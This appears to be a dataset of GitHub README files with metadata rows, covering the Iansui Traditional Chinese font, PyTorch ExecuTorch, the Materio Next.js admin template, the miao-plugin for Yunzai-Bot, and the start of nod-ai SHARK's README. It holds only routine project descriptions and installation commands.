基於 Fontworks 的 Klee One 衍生的開源繁體中文字型。
## 簡介
Fontworks 的 Klee(クレー)字型原本內建於 macOS,因其兼具楷體筆調、又似仿宋整齊端正,具高易讀性與溫暖外形,廣受中文使用者喜好。然而畢竟是日文字型,雖然字數不少,但排中文時仍有一定程度缺字,一直是可惜之處。
但 2020 年底,Fontworks 忽然以開源授權釋出了 Klee One 字型,震驚字型圈。網路上已有許多其他專案嘗試為 Klee One 補上中文字,如簡體中文補字的 [LXGW WenKai / 霞鹜文楷](https://github.com/lxgw/LxgwWenKai) 與傳統字形補字的 [Klee One 繁體中文版](https://dorawei.xyz/klee-one-tc/) 等。
此專案「芫荽」則是嘗試**盡可能**調整字形貼近教育部標準字體,並補充台客語用字,貼近台灣需求,並適合學齡教育使用(如童書、國字習作等)。
由於原 Klee 的 Regular 偏細而預估使用需求較低,本專案以原 SemiBold 為底製作。
## 最新版本與下載方式
目前最新版本為 1.002,請[點此](ChangeLog.md)查看詳細異動紀錄。
請點選本頁面右側「[Releases](https://github.com/ButTaiwan/iansui/releases)」處的最新發行版本,下載 iansui.zip。解壓縮後安裝裡面的 .ttf 字型檔案即可。
## 收錄字數
* Big5範圍內約8,170字。**注意並沒有包含Big5完整的13,560字。**
* 支援jf當務字集基本包與擴充包所有文字。
* 台、客語漢字(教育部《[臺灣閩南語常用詞辭典](https://twblg.dict.edu.tw/holodict_new/)》《[臺灣客家語常用詞辭典](https://hakkadict.moe.edu.tw/cgi-bin/gs32/gsweb.cgi/login?o=dwebmge&cache=1641872312920)》內所有推薦用字。原則上不收錄異用字。)、常用粵語字。
* 注音符號與方音符號。
* 支援台羅拼音、台語白話字拼音、客語拼音、客語白話字拼音、原住名族語拼音、漢語拼音、馬祖福州話拼音編排。
* 依繁體中文習慣,全形標點符號置中。括弧引號類亦調整為稍比日文原形向中靠攏。
* 數字 7、英文大寫字母 I 亦調整為更貼近台灣教科書的寫法。
* 支援 KK 音標、DJ 音標 KK 音標、DJ 音標需要之所有字母、重音標號,可從下表複製使用:
- KK: ɑæɛəɪɔᴜʌɚɝ aɪaᴜ θʃðʒŋḷṃṇ ‵ʹ͵
- DJ: ɑæəɜɪɔʊʌː aɪaʊ θʃðʒŋ ˈˌ
- 注意因為芫荽的 a 預設是單層,而 Unicode 沒有兩層 a 的字碼,故以標準連字方式來實作。當 a 出現在 ɪᴜʊ 之前時顯示為兩層。故單層 a 也可以不用刻意輸入 ɑ。
![芫荽範例字/iansui](img/iansui_sample.jpg)
## 字形調整原則
本字型**盡可能**調整字形貼近教育部標準字體,包括印刷體形式的斷筆,也都調整為一筆劃。
保留與 Klee 原封不動的字符約僅 3000 字(含調整過異體映射者),超過 4000 字符經過修改,並補字超過 2000 字。
開發時參考《[國字標準字體研訂原則](https://language.moe.gov.tw/001/upload/files/site_content/m0001/biau/c12.htm?open)》之規定,但《[國字標準字體教師手冊](https://language.moe.gov.tw/001/Upload/files/SITE_CONTENT/M0001/STD/c4.htm?open)》部分所述之部分規定不見於通則與分則,先不考慮處理。
因個人審美、人力等因素,以下細節目前決定不修改,或可能與標楷體有些許差異。
* 「又」字不閉口。(標準字體研訂原則規定又字閉口,但又字數量太多,且又第二筆做點時,閉口造形難以處理又不美觀。)
* 「攵」字閉口。(配合 Klee 原始造形設計)
* **不嚴格處理筆劃是否接觸**,如宀、立、羊等字的點是否與下橫接觸等。「𧘇」部件亦保留 Klee 的左右接觸設計。
* 日、目、田⋯⋯等字的右下角閉口方式,目前均保留 Klee 原始設計(比照「口」),相關文字實在太多,無法全面修改。
* 「糹」做為左偏旁時,最左點的方向與標楷體不同,此為美觀考量。此字體中宮鬆較正方,三點均朝右難以站穩。如同「灬」,連續的點,最左方點朝左或朝右,應視為審美選擇。
* Klee One 原有收錄的字,但在 Big5 範圍外且非台客語漢字者,原則上先視為日文異體,保留原字形不進行調整。
即本專案以較寬鬆的方式解釋教育部標準字體的規定,如同思源宋體、思源黑體、蘋方等其他字型。
這樣的寫法是否已足夠應付學齡教學使用,盼大眾能提供反饋。
## 備註
1. 本字型目前尚為 Beta 測試版本,若發現有字符出現外框錯誤,請在 issues 回報,謝謝。
2. 部分文字是否符合教育部標準字體標準可能見仁見智。
3. 因人力有限,目前沒有計畫製作完整 Big5 字集甚至更多 Unicode 漢字。若有缺字,可考慮與 [霞鹜文楷](https://github.com/lxgw/LxgwWenKai) 等其他 Klee One 的中文補字專案混排使用。但無法保證為標準字體。
4. 本頁面圖片提供:王皓梅、陳建中
## 開源授權規定
* 本字型基於 SIL Open Font License 1.1,改造 Fontworks 發佈的 [Klee](https://github.com/fontworks-fonts/Klee) 開源專案。
* Klee 是 Fontworks 的商標。
* 芫荽 是本專案的保留名稱。
* 任何人可以無償使用此字型,包含商用。無須告知原作者。
* 您可自由傳送、分享此字型,或與其他軟體綑綁發行、銷售。捆包中必須同時包含授權文件檔(OFL.txt)。
* 您可自由改造、衍生此字型並公開。修改後的字型必須同樣以 [SIL OFL](https://scripts.sil.org/OFL) 進行發佈,並請勿使用字型的保留名稱。
* 依照 [SIL OFL](https://scripts.sil.org/OFL) 規定,**禁止單獨出售字型檔(ttf/otf)**。
## 芫荽家族
- [注音芫荽](https://github.com/ButTaiwan/bpmfvs) 芫荽的注音字型。
- [字咍芫荽](https://github.com/ButTaiwan/taigivs) 台語標音字型家族。
## 相關資料
- [Fontworks 株式会社](http://fontworks.co.jp) 提供原版字型: [Klee GitHub Page](https://github.com/fontworks-fonts/)
- [LXGW WenKai / 霞鹜文楷](https://github.com/lxgw/LxgwWenKai)
- [國字標準字體研訂原則](https://language.moe.gov.tw/001/upload/files/site_content/m0001/biau/c12.htm?open)
- [國字標準字體教師手冊](https://language.moe.gov.tw/001/Upload/files/SITE_CONTENT/M0001/STD/c4.htm?open)
## 請斗內QQ
個人維護開源字型工程浩大,有足夠的支持,才有持續改版、精進的空間。若您覺得此字型能幫助到您,麻煩贊助一下吧Q_Q
![請斗內](img/donatation240425.png)
信用卡(含國際信用卡)、超商條碼、超商代收,請 [點這裡](https://p.ecpay.com.tw/930AED7) 。
| 芫荽,基於 Klee One 改造的學習用台灣繁體字型 | null | 7 | 2 | 0 | 37 | 8 | 1 | 0 |
pytorch/executorch | # ExecuTorch
**ExecuTorch** is an end-to-end solution for enabling on-device inference
capabilities across mobile and edge devices including wearables, embedded
devices and microcontrollers. It is part of the PyTorch Edge ecosystem and
enables efficient deployment of PyTorch models to edge devices.
Key value propositions of ExecuTorch are:
- **Portability:** Compatibility with a wide variety of computing platforms,
from high-end mobile phones to highly constrained embedded systems and
microcontrollers.
- **Productivity:** Enabling developers to use the same toolchains and SDK from
PyTorch model authoring and conversion, to debugging and deployment to a wide
variety of platforms.
- **Performance:** Providing end users with a seamless and high-performance
experience due to a lightweight runtime and utilizing full hardware
capabilities such as CPUs, NPUs, and DSPs.
For a comprehensive technical overview of ExecuTorch and step-by-step tutorials,
please visit our documentation website [for the latest release](https://pytorch.org/executorch/stable/index.html) (or the [main branch](https://pytorch.org/executorch/main/index.html)).
## Feedback
We welcome any feedback, suggestions, and bug reports from the community to help
us improve our technology. Please use the [PyTorch
Forums](https://discuss.pytorch.org/c/executorch) for discussion and feedback
about ExecuTorch using the **ExecuTorch** category, and our [GitHub
repository](https://github.com/pytorch/executorch/issues) for bug reporting.
We recommend using the latest release tag from the
[Releases](https://github.com/pytorch/executorch/releases) page when developing.
## Directory Structure
```
executorch
├── backends # Backend delegate implementations.
├── build # Utilities for managing the build system.
├── codegen # Tooling to autogenerate bindings between kernels and the runtime.
├── configurations
├── docs # Static docs tooling.
├── examples # Examples of various user flows, such as model export, delegates, and runtime execution.
├── exir # Ahead-of-time library: model capture and lowering APIs.
| ├── _serialize # Serialize final export artifact.
| ├── backend # Backend delegate ahead of time APIs
| ├── capture # Program capture.
| ├── dialects # Op sets for various dialects in the export process.
| ├── emit # Conversion from ExportedProgram to ExecuTorch execution instructions.
| ├── operator # Operator node manipulation utilities.
| ├── passes # Built-in compiler passes.
| ├── program # Export artifacts.
| ├── serde # Graph module
serialization/deserialization.
| ├── verification # IR verification.
├── extension # Extensions built on top of the runtime.
| ├── android # ExecuTorch wrappers for Android apps.
| ├── apple # ExecuTorch wrappers for iOS apps.
| ├── aten_util # Converts to and from PyTorch ATen types.
| ├── data_loader # 1st party data loader implementations.
| ├── evalue_util # Helpers for working with EValue objects.
| ├── gguf_util # Tools to convert from the GGUF format.
| ├── kernel_util # Helpers for registering kernels.
| ├── memory_allocator # 1st party memory allocator implementations.
| ├── module # A simplified C++ wrapper for the runtime.
| ├── parallel # C++ threadpool integration.
| ├── pybindings # Python API for executorch runtime.
| ├── pytree # C++ and Python flattening and unflattening lib for pytrees.
| ├── runner_util # Helpers for writing C++ PTE-execution
tools.
| ├── testing_util # Helpers for writing C++ tests.
| ├── training # Experimental libraries for on-device training
├── kernels # 1st party kernel implementations.
| ├── aten
| ├── optimized
| ├── portable # Reference implementations of ATen operators.
| ├── prim_ops # Special ops used in executorch runtime for control flow and symbolic primitives.
| ├── quantized
├── profiler # Utilities for profiling runtime execution.
├── runtime # Core C++ runtime.
| ├── backend # Backend delegate runtime APIs.
| ├── core # Core structures used across all levels of the runtime.
| ├── executor # Model loading, initalization, and execution.
| ├── kernel # Kernel registration and management.
| ├── platform # Layer between architecture specific code and portable C++.
├── schema # ExecuTorch PTE file format flatbuffer
schemas.
├── scripts # Utility scripts for size management, dependency management, etc.
├── sdk # Model profiling, debugging, and introspection.
├── shim # Compatibility layer between OSS and Internal builds
├── test # Broad scoped end-to-end tests.
├── third-party # Third-party dependencies.
├── util # Various helpers and scripts.
```
## License
ExecuTorch is BSD licensed, as found in the LICENSE file.
| On-device AI across mobile, embedded and edge for PyTorch | deep-learning,embedded,machine-learning,mobile,neural-network,tensor,gpu | 8 | 165 | 3,747 | 3,044 | 106 | 1,619 | 13 |
themeselection/materio-mui-nextjs-admin-template-free | <p align="center"></p>
<p align="center">
<a href="https://themeselection.com/item/materio-free-mui-nextjs-admin-template" target="_blank">
<img src="https://cdn.themeselection.com/ts-assets/materio/logo/logo.png" alt="materio-logo" width="60px" height="auto">
</a>
</p>
<h1 align="center">
<a href="https://themeselection.com/item/materio-free-mui-nextjs-admin-template" target="_blank" align="center">
Materio - Free MUI NextJS Admin Template
</a>
</h1>
<p align="center">Most Powerful & Comprehensive Free MUI NextJS Admin Dashboard Template built for developers!</p>
<p align="center">
<a href="https://github.com/themeselection/materio-mui-nextjs-admin-template-free/blob/main/LICENSE">
<img src="https://img.shields.io/github/license/themeselection/materio-mui-nextjs-admin-template-free" alt="license">
</a>
<img alt="GitHub Workflow Status" src="https://img.shields.io/github/actions/workflow/status/themeselection/materio-mui-nextjs-admin-template-free/deploy-demos.yml">
<a href="https://github.com/themeselection/materio-mui-nextjs-admin-template-free/releases">
<img src="https://img.shields.io/github/release/themeselection/materio-mui-nextjs-admin-template-free.svg" alt="GitHub release">
</a>
<a href="https://twitter.com/Theme_Selection" target="_blank">
<img alt="Twitter Follow" src="https://img.shields.io/twitter/follow/Theme_Selection">
</a>
</p>
<kbd>[![Materio - Free MUI NextJS Admin Template Demo Screenshot](https://cdn.themeselection.com/ts-assets/materio/materio-mui-nextjs-admin-template-free/marketing/materio-mui-nextjs-admin-template-free-github.png)](https://themeselection.com/item/materio-free-mui-nextjs-admin-template)</kbd>
## Introduction 🚀
If you're a developer looking for the most Powerful & comprehensive [Free MUI NextJS Admin Dashboard Template](https://themeselection.com/item/materio-free-mui-nextjs-admin-template) built for developers, rich with features, and highly customizable, look no further than Materio. We've followed the highest industry standards to bring you the very best admin template that is not only easy to use but highly scalable. Offering ultimate convenience and flexibility, you'll be able to build whatever application you want with very little hassle.
Build premium quality applications with ease. Use one of the most innovative [NextJS admin templates](https://themeselection.com/item/category/next-js-admin-template) to create eye-catching, high-quality WebApps. Your apps will be completely responsive, ensuring they'll look stunning and function flawlessly on desktops, tablets, and mobile devices.
Materio provides a template with TypeScript and JavaScript.
[View Demo](https://demos.themeselection.com/materio-mui-nextjs-admin-template-free/demo)
## Features 📋
- ⚡ [Next.js](https://nextjs.org) with App Router support
- 💎 Integrated with [MUI](https://mui.com) & [Tailwind CSS](https://tailwindcss.com)
- ✅ [TypeScript](https://www.typescriptlang.org) & JavaScript Support
- 📏 Linter with [ESLint](https://eslint.org)
- 💖 Code Formatter with [Prettier](https://prettier.io)
- 🗂 VSCode configuration: Settings, Extensions and Custom Snippets
- 💡 Absolute Imports with aliases
- ☕ Minify HTML & CSS
- 💨 Live reload
- ✅ Cache busting
- 🛠️ Easy to customize
- 😎 SEO-friendly
- 🚀 Production-ready
## Requirements ✅
- Node.js LTS version (not current version)
- npm
## Installation ⚒️
Installing and running the template is super easy in Materio, please follow these steps and you should be ready to rock 🤘:
1. Make sure you have installed Node.js (LTS). If Node.js is already installed in your system, make sure the installed version is LTS (and not the latest version)
2. Navigate to the `typescript-version` or `javascript-version` folder and run the following command to install our local dependencies listed in the `package.json` file. You can use `pnpm`, `yarn` or `npm` as per your preference
> It is recommended to use pnpm for better dependency management
```bash
# For pnpm (recommended)
pnpm install
# For yarn
yarn install
# For npm
npm install
```
3. Rename the `.env.example` file to `.env` file
4. Now, you are ready to start the server with the help of the command shown below. Open [http://localhost:3000](http://localhost:3000) to check your development 🚀.
```bash
# For pnpm (recommended)
pnpm dev
# For yarn
yarn dev
# For npm
npm run dev
```
## What's Included 📦
- Layouts
- Blank
- Full
- Boxed
- Dashboard
- Pages
- Account Settings
- Login
- Register
- Forgot Password
- Error
- Under Maintenance
- Iconify Icons
- Basic Cards
- Form Layouts
## What's in Premium Version 💎
| Materio Free Version | Materio Premium Version |
| ----------------------------------------------- | :------------------------------------------------ |
| [Demo](https://demos.themeselection.com/materio-mui-nextjs-admin-template-free/demo) | [Demo](https://demos.themeselection.com/materio-mui-nextjs-admin-template/demo-1) |
| [Download](https://themeselection.com/item/materio-free-mui-nextjs-admin-template) | [Purchase](https://themeselection.com/item/materio-free-mui-nextjs-admin-template) |
| Single vertical menu | Vertical (+ vertical collapsed) & Horizontal menu |
| Default skin | Default, bordered & semi-dark skin |
| 1 simple dashboard | 5 niche dashboards |
| - | 10 Applications including eCommerce, academy, email, chat, calendar, invoice, kanban, etc. |
| Simple form layouts | Advanced form layouts, form validation & form wizard |
| Basic cards | Basic, advanced, statistics, charts, gamification & action cards |
| - | Quick search - quickly navigate between pages (with hotkey support) |
| Basic tables | Advanced tables |
| 1 chart library | 2 chart libraries |
| 6 pages | 35+ pages |
| Simple navbar & footer | Multiple navbar & footer options |
| - | Authentication using NextAuth |
| - | RTL (right-to-left) support |
| - | Redux toolkit |
| - | Multi-lingual support |
| - | Starter-kit |
| - | Customizer drawer to check options in live app |
| Limited customization | Endless customization possibilities |
| Regular support | Priority support |
## Documentation 📜
Check out our live [Documentation](https://demos.themeselection.com/materio-mui-nextjs-admin-template/documentation)
## Deployment 🚀
Check out our [Deployment docs](https://demos.themeselection.com/materio-mui-nextjs-admin-template/documentation/docs/guide/deployment)
## Browser Support 🖥️
![chrome](https://github.com/nuxt/nuxt/assets/47495003/bbb6d7b0-2db6-4af4-abdc-a73de71dd287)
![firefox](https://github.com/nuxt/nuxt/assets/47495003/bca1f2d0-d597-453b-8525-5c94e36bfc33)
![safari](https://github.com/nuxt/nuxt/assets/47495003/8ecbb395-78fb-40fb-bb59-7301bf8a7e5d)
![Microsoft Edge](https://github.com/nuxt/nuxt/assets/47495003/f945821b-0cbd-464d-8103-824d4d5c4e9a)
*_It also supports other browser which implemented latest CSS standards_
## Contributing 🦸
Contribution are always welcome and recommended! Here is how:
* Fork the repository ([here is the guide](https://docs.github.com/en/get-started/quickstart/fork-a-repo)).
* Clone to your machine `git clone https://github.com/YOUR_USERNAME/REPO_NAME` Make your changes
* Create a pull request
### Contribution Requirements 🧰
* When you contribute, you agree to give a non-exclusive license to ThemeSelection to use that contribution in any context as we (ThemeSelection) see appropriate.
* If you use content provided by another party, it must be appropriately licensed using an open source license.
* Contributions are only accepted through Github pull requests.
* Finally, contributed code must work in all supported browsers (see above for browser support).
## Changelog 📆
Please refer to the [CHANGELOG](CHANGELOG.md) file. We will add a detailed release notes to each new release.
## Support 🧑🏻💻
For free products, enjoy community support via GitHub issues. Upgrade to Premium for dedicated support from our expert team.
## License ©
- Copyright © [ThemeSelection](https://themeselection.com/)
- Licensed under [MIT](LICENSE)
- All our free items are Open Source and licensed under MIT. You can use our free items for personal as well as commercial purposes. We just need an attribution from your end. Copy the below link and paste it at the footer of your web application or project.
```html
<a href="https://themeselection.com/">ThemeSelection</a>
```
## Also Available In
<p>
<!-- Figma -->
<a href="https://themeselection.com/item/materio-figma-admin-dashboard-ui-kit" target="_blank"><picture><source width="auto" height="74px" media="(prefers-color-scheme: dark)" srcset="https://github.com/microsoft/vscode/assets/47495003/0318a6c8-4f9b-4cf6-af5e-d357f909ea2b"><source width="auto" height="74px" media="(prefers-color-scheme: light)" srcset="https://github.com/microsoft/vscode/assets/47495003/47f21dfe-c1fc-4a7d-859e-4d98f8cdded1"><img width="auto" height="74px" alt="html" src="https://github.com/microsoft/vscode/assets/47495003/47f21dfe-c1fc-4a7d-859e-4d98f8cdded1"></picture></img></a>
<!-- HTML -->
<a href="https://themeselection.com/item/materio-dashboard-pro-bootstrap" target="_blank"><picture><source width="auto" height="74px" media="(prefers-color-scheme: dark)" srcset="https://github.com/microsoft/vscode/assets/47495003/5fe77c46-2e4c-475a-8dec-e30e2badddee"><source width="auto" height="74px" media="(prefers-color-scheme: light)" srcset="https://github.com/microsoft/vscode/assets/47495003/3f5decd8-cd99-4ed3-aa76-528ca061385b"><img width="auto" height="74px" alt="html" src="https://github.com/microsoft/vscode/assets/47495003/3f5decd8-cd99-4ed3-aa76-528ca061385b"></picture></img></a>
<!-- HTML + Laravel -->
<a href="https://themeselection.com/item/materio-dashboard-pro-laravel" target="_blank"><picture><source width="auto" height="74px" media="(prefers-color-scheme: dark)" srcset="https://github.com/microsoft/vscode/assets/47495003/efe420e4-9863-41b7-9eda-47ea94f21a62"><source width="auto" height="74px" media="(prefers-color-scheme: light)" srcset="https://github.com/microsoft/vscode/assets/47495003/be3b86e0-4d5e-4736-bf89-4267fb4d6710"><img width="auto" height="74px" alt="html_laravel" src="https://github.com/microsoft/vscode/assets/47495003/be3b86e0-4d5e-4736-bf89-4267fb4d6710"></picture></img></a>
<!-- HTML + Django -->
<a href="https://themeselection.com/item/materio-dashboard-pro-django" target="_blank"><picture><source width="auto" height="74px" media="(prefers-color-scheme: dark)" srcset="https://github.com/microsoft/vscode/assets/47495003/3c87d33b-1223-4aaa-a652-388dcb714c98"><source width="auto" height="74px" media="(prefers-color-scheme: light)" srcset="https://github.com/microsoft/vscode/assets/47495003/51db1947-eac1-466f-87fd-5a209010fe9c"><img width="auto" height="74px" alt="html_django" src="https://github.com/microsoft/vscode/assets/47495003/51db1947-eac1-466f-87fd-5a209010fe9c"></picture></img></a>
<!-- .Net Core -->
<a href="https://themeselection.com/item/materio-aspnet-core-mvc-admin-template" target="_blank"><picture><source width="auto" height="74px" media="(prefers-color-scheme: dark)" srcset="https://github.com/microsoft/vscode/assets/47495003/6327fd7b-9c54-4189-a852-28551ad0e002"><source width="auto" height="74px" media="(prefers-color-scheme: light)" srcset="https://github.com/microsoft/vscode/assets/47495003/9856e9d5-021f-4573-902a-702e80dd0102"><img width="auto" height="74px" alt="net_core" src="https://github.com/microsoft/vscode/assets/47495003/9856e9d5-021f-4573-902a-702e80dd0102"></picture></img></a>
<!-- NextJS -->
<a href="https://themeselection.com/item/materio-mui-nextjs-admin-template" target="_blank"><picture><source width="auto" height="74px" media="(prefers-color-scheme: dark)" srcset="https://github.com/microsoft/vscode/assets/47495003/66344629-6d21-4f92-9078-f479b39cb34e"><source width="auto" height="74px" media="(prefers-color-scheme: light)" srcset="https://github.com/microsoft/vscode/assets/47495003/e1daf4e1-3fa5-4a44-969a-6143ddd67310"><img width="auto" height="74px" alt="next.js" src="https://github.com/microsoft/vscode/assets/47495003/e1daf4e1-3fa5-4a44-969a-6143ddd67310"></picture></img></a>
<!-- Vue -->
<a href="https://themeselection.com/item/materio-vuetify-vuejs-admin-template" target="_blank"><picture><source width="auto" height="74px" media="(prefers-color-scheme: dark)" srcset="https://github.com/microsoft/vscode/assets/47495003/881bbbb8-d1c9-421c-9bce-4ea43dfa9e6e"><source width="auto" height="74px" media="(prefers-color-scheme: light)" srcset="https://github.com/microsoft/vscode/assets/47495003/b02d6473-0345-42c2-be58-e648806104fa"><img width="auto" height="74px" alt="vue" src="https://github.com/microsoft/vscode/assets/47495003/b02d6473-0345-42c2-be58-e648806104fa"></picture></img></a>
<!-- Vue + Laravel -->
<a href="https://themeselection.com/item/materio-vuetify-vuejs-laravel-admin-template" target="_blank"><picture><source width="auto" height="74px" media="(prefers-color-scheme: dark)" srcset="https://github.com/microsoft/vscode/assets/47495003/20b6428e-3fa5-4f80-a389-9e4cd732c2de"><source width="auto" height="74px" media="(prefers-color-scheme: light)" srcset="https://github.com/microsoft/vscode/assets/47495003/3008d3eb-7b5b-4d9c-8563-837744a901da"><img width="auto" height="74px" alt="vue_laravel" src="https://github.com/microsoft/vscode/assets/47495003/3008d3eb-7b5b-4d9c-8563-837744a901da"></picture></img></a>
<!-- Nuxt -->
<a href="https://themeselection.com/item/materio-vuetify-nuxtjs-admin-template" target="_blank"><picture><source width="auto" height="74px" media="(prefers-color-scheme: dark)" srcset="https://github.com/microsoft/vscode/assets/47495003/d9d3cf2e-4dc5-49fe-b146-b80ef010cb57"><source width="auto" height="74px" media="(prefers-color-scheme: light)" srcset="https://github.com/microsoft/vscode/assets/47495003/f18ba562-6bba-4a55-83ac-962ecefa636f"><img width="auto" height="74px" alt="nuxt" src="https://github.com/microsoft/vscode/assets/47495003/f18ba562-6bba-4a55-83ac-962ecefa636f"></picture></img></a>
</p>
## Looking For Premium Admin Templates ?? 👀
**[ThemeSelection](https://themeselection.com/)** provides Selected high quality, modern design, professional and easy-to-use **Fully Coded Dashboard Templates & UI Kits** to create your applications faster!
- [Bootstrap Admin Templates](https://themeselection.com/item/category/bootstrap-admin-template/)
- [VueJS Admin Templates](https://themeselection.com/item/category/vuejs-admin-templates/)
- [Laravel Admin Templates](https://themeselection.com/item/category/laravel-admin-templates/)
- [Django Admin Templates](https://themeselection.com/item/category/django-admin-template/)
- [React (NextJS) Admin Templates](https://themeselection.com/item/category/next-js-admin-template/)
- [ASP.Net Core Admin Templates](https://themeselection.com/item/category/asp-net-dashboard/)
- [Free UI Kits](https://themeselection.com/item/category/free-ui-kits/)
If you want to [Download Free Admin Templates](https://themeselection.com/item/category/free-admin-templates/) like Materio then do visit [ThemeSelection](https://themeselection.com/).
## Useful Links 🎁
* [Vue CheatSheet](https://vue-cheatsheet.themeselection.com/)
* [Freebies](https://themeselection.com/item/category/free-admin-templates/)
* [Download Free Admin Templates](https://themeselection.com/item/category/free-admin-templates/)
* [Bootstrap 5 CheatSheet](https://bootstrap-cheatsheet.themeselection.com/)
## Social Media :earth_africa:
- [Twitter](https://twitter.com/Theme_Selection)
- [Facebook](https://www.facebook.com/ThemeSelections/)
- [Pinterest](https://pinterest.com/themeselect/)
- [Instagram](https://www.instagram.com/themeselection/)
- [Discord](https://discord.gg/kBHkY7DekX)
- [YouTube](https://www.youtube.com/channel/UCuryo5s0CW4aP83itLjIdZg)
| An enterprise-grade Next.js admin dashboard template. Made with developer experience first: Next.js v14 (App Router), Material UI (MUI), Tailwind CSS, TypeScript, ESLint, Prettier, VSCode Configs !! 🚀 | admin-dashboard,admin-template,freebies,admin-dashboard-template,dashboard-template,nextjs-admin,boilerplate,free-admin-dashboard,free-admin-template,javascript | 2 | 21 | 16 | 45 | 0 | 2 | 4 |
yoimiya-kokomi/miao-plugin | # Miao-Plugin 说明
`miao-plugin`是一个`Yunzai-Bot`的升级插件,提供包括角色面板、角色查询等角色相关功能。
具体功能可在安装插件后 通过 `#喵喵帮助` 进行查看。如需进行设置则可通过 `#喵喵设置` 命令进行管理。
---
## 安装与更新
### 使用Git安装(推荐)
请将 miao-plugin 放置在 Yunzai-Bot 的 plugins 目录下,重启 Yunzai-Bot 后即可使用。
请使用 git 进行安装,以方便后续升级。在 Yunzai-Bot 根目录夹打开终端,运行下述指令之一
```
// 使用gitee
git clone --depth=1 https://gitee.com/yoimiya-kokomi/miao-plugin.git ./plugins/miao-plugin/
pnpm install -P
// 使用github
git clone --depth=1 https://github.com/yoimiya-kokomi/miao-plugin.git ./plugins/miao-plugin/
pnpm install -P
```
进行安装。安装完毕后,管理员只需发送 `#喵喵更新` 即可自动更新 miao-plugin。
### 手工下载安装(不推荐)
手工下载安装包,解压后将`miao-plugin-master`更名为`miao-plugin`,然后放置在Yunzai的plugins目录内
虽然此方式能够使用,但无法使用`#喵喵更新`进行更新,不利于后续升级,故不推荐使用
---
## Yunzai版本与支持
`miao-plugin` 支持V3 / V2 版本的Yunzai-Bot
* [Miao-Yunzai](https://github.com/yoimiya-kokomi/Miao-Yunzai) : 喵版Yunzai [Gitee](https://gitee.com/yoimiya-kokomi/Miao-Yunzai)
/ [Github](https://github.com/yoimiya-kokomi/Miao-Yunzai) ,本体不含签到功能,功能迭代较多,与miao-plugin打通,只建议新部署/迁移
* [Yunzai-V3](https://github.com/yoimiya-kokomi/Yunzai-Bot) :Yunzai V3 - 喵喵维护版,icqq版本,与原版Yunza功能基本一致,会保持卡池更新,功能相对稳定,可从原版Yunzai换源直接升级
* [Yunzai-V3](https://gitee.com/Le-niao/Yunzai-Bot) :Yunzai V3 - 乐神原版,oicq版本,可能会遇到登录问题
---
## 功能说明
### #雷神面板
使用指令 `#面板帮助` 即可了解如何使用此功能。
#### #更新面板
`#更新面板` 依赖于面板查询API,面板服务由 http://enka.network/ 提供。
> 查询功能经Enka官方授权([issue#63](https://github.com/yoimiya-kokomi/miao-plugin/issues/63#issuecomment-1199348789)),感谢Enka提供的面板查询服务
>
> 如果可以的话,也请在Patreon上支持Enka,或提供闲置的原神账户,具体可在[Enka官网](http://enka.network/) Discord联系
>
> [issue#63](https://github.com/yoimiya-kokomi/miao-plugin/issues/63#issuecomment-1199734496)
> 可尝试使用`MiniGG-Api`面板服务 [@MiniGrayGay](https://github.com/MiniGrayGay)<br>
> 发送 `#喵喵设置面板服务332` 修改国服&B服的面板查询由 `MiniGG-Api` 处理
#### #雷神伤害
喵喵面板附带的伤害计算功能由喵喵本地计算。如计算有偏差 #雷神伤害 查看伤害加成信息,如确认伤害计算有误可提供伤害录屏截图及uid进行反馈
#### #雷神圣遗物
圣遗物评分为喵喵版评分规则
---
**在有一定阅读理解能力基础下,建议阅读 [CHANGELOG.md](CHANGELOG.md) 以了解更多内容。**
其余文档咕咕咕中
---
# 免责声明
1. `miao-plugin`自身的UI与代码均开放,无需征得特殊同意,可任意使用。能备注来源最好,但不强求
2. 以上声明但仅代表`miao-plugin`自身的范畴,请尊重Yunzai本体及其他插件作者的努力,勿将Yunzai及其他插件用于以盈利为目的的场景
3. miao-plugin的图片与其他素材均来自于网络,仅供交流学习使用,如有侵权请联系,会立即删除
# 资源
* [Miao-Yunzai](https://github.com/yoimiya-kokomi/Miao-Yunzai) : 喵版Yunzai [Gitee](https://gitee.com/yoimiya-kokomi/Miao-Yunzai)
/ [Github](https://github.com/yoimiya-kokomi/Miao-Yunzai)
* [Yunzai-V3](https://github.com/yoimiya-kokomi/Yunzai-Bot) :Yunzai V3 - 喵喵维护版(使用 icqq)
* [Yunzai-V3](https://gitee.com/Le-niao/Yunzai-Bot) :Yunzai V3 - 乐神原版(使用 oicq)
* [miao-plugin](https://github.com/yoimiya-kokomi/miao-plugin) : 喵喵插件 [Gitee](https://gitee.com/yoimiya-kokomi/miao-plugin)
/ [Github](https://github.com/yoimiya-kokomi/miao-plugin)
# 其他&感谢
* [Enka.Network](https://enka.network/): 感谢Enka提供的面板服务
* [Snap.Hutao](https://hut.ao/) : 感谢 DGP Studio 开发的 [胡桃 API](https://github.com/DGP-Studio/Snap.Hutao.Server)
* QQ群(暂时停止新加入,请见谅)
* Yunzai-Bot 官方QQ群:213938015
* 喵喵Miao-Plugin QQ群:607710456
* [爱发电](https://afdian.net/@kokomi) :欢迎老板打赏,喵~
| Miao-Plugin for Yunzai-Bot | null | 0 | 65 | 188 | 1,225 | 138 | 2 | 0 |
nod-ai/SHARK | # SHARK
High Performance Machine Learning Distribution
*We are currently rebuilding SHARK to take advantage of [Turbine](https://github.com/nod-ai/SHARK-Turbine). Until that is complete make sure you use an .exe release or a checkout of the `SHARK-1.0` branch, for a working SHARK*
[![Nightly Release](https://github.com/nod-ai/SHARK/actions/workflows/nightly.yml/badge.svg)](https://github.com/nod-ai/SHARK/actions/workflows/nightly.yml)
[![Validate torch-models on Shark Runtime](https://github.com/nod-ai/SHARK/actions/workflows/test-models.yml/badge.svg)](https://github.com/nod-ai/SHARK/actions/workflows/test-models.yml)
<details>
<summary>Prerequisites - Drivers </summary>
#### Install your Windows hardware drivers
* [AMD RDNA Users] Download the latest driver (23.2.1 is the oldest supported) [here](https://www.amd.com/en/support).
* [macOS Users] Download and install the 1.3.216 Vulkan SDK from [here](https://sdk.lunarg.com/sdk/download/1.3.216.0/mac/vulkansdk-macos-1.3.216.0.dmg). Newer versions of the SDK will not work.
* [Nvidia Users] Download and install the latest CUDA / Vulkan drivers from [here](https://developer.nvidia.com/cuda-downloads)
#### Linux Drivers
* MESA / RADV drivers wont work with FP16. Please use the latest AMGPU-PRO drivers (non-pro OSS drivers also wont work) or the latest NVidia Linux Drivers.
Other users please ensure you have your latest vendor drivers and Vulkan SDK from [here](https://vulkan.lunarg.com/sdk/home) and if you are using vulkan check `vulkaninfo` works in a terminal window
